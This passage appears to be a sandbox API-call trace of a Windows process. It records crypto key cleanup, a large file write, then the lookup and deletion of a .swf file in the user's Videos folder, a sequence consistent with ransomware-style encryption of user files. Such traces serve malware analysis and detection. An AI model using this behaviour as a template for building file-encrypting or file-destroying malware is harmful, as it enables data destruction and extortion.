[0213.930] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x17998, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x17998, lpOverlapped=0x0) returned 1 [0213.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.932] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0213.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.932] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0213.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.932] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.932] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.933] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.933] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.933] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.933] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab5a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0213.933] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0213.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.933] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.933] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.933] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.933] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.933] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.933] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.934] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.934] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.934] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.934] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.934] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.934] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.934] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.934] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.934] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.934] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.935] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.935] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.935] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.935] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.935] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.935] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0213.938] CryptReleaseContext (hProv=0xa7c550, dwFlags=0x0) returned 1 [0213.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.938] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.938] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.938] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.938] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.938] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.938] FreeLibrary (hLibModule=0x76390000) returned 1 [0213.939] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.939] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.939] CloseHandle (hObject=0x468) returned 1 [0213.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.980] CloseHandle (hObject=0x520) returned 1 [0213.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.984] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.984] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.984] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/sDbATpZQ6r.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\sDbATpZQ6r.swf", lpFilePart=0x8cedf4*="sDbATpZQ6r.swf") returned 0x25 [0213.984] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\sDbATpZQ6r.swf" (normalized: "c:\\users\\fd1hvy\\videos\\sdbatpzq6r.swf")) returned 0x20 [0213.984] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\sDbATpZQ6r.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62ccc210, ftCreationTime.dwHighDateTime=0x1d5d08d, ftLastAccessTime.dwLowDateTime=0xe5493b90, ftLastAccessTime.dwHighDateTime=0x1d5c9f5, ftLastWriteTime.dwLowDateTime=0xe5493b90, ftLastWriteTime.dwHighDateTime=0x1d5c9f5, nFileSizeHigh=0x0, nFileSizeLow=0x17996, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="sDbATpZQ6r.swf", cAlternateFileName="SDBATP~1.SWF")) returned 0x9e21f8 [0213.984] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\sDbATpZQ6r.swf" (normalized: "c:\\users\\fd1hvy\\videos\\sdbatpzq6r.swf")) returned 1 [0213.986] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62ccc210, ftCreationTime.dwHighDateTime=0x1d5d08d, ftLastAccessTime.dwLowDateTime=0xe5493b90, ftLastAccessTime.dwHighDateTime=0x1d5c9f5, ftLastWriteTime.dwLowDateTime=0xe5493b90, ftLastWriteTime.dwHighDateTime=0x1d5c9f5, nFileSizeHigh=0x0, nFileSizeLow=0x17996, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="sDbATpZQ6r.swf", cAlternateFileName="SDBATP~1.SWF")) returned 0 [0213.986] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0213.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0213.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.986] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0213.986] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafa8 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0213.987] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0214.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0214.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0214.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eac38 [0214.036] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/sDbATpZQ6r.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\sDbATpZQ6r.swf", lpFilePart=0x8cf650*="sDbATpZQ6r.swf") returned 0x25 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac38 | out: hHeap=0x2af0000) returned 1 [0214.036] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\sDbATpZQ6r.swf" (normalized: "c:\\users\\fd1hvy\\videos\\sdbatpzq6r.swf")) returned 0xffffffff [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.037] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0214.037] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.037] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.037] HeapFree (in: 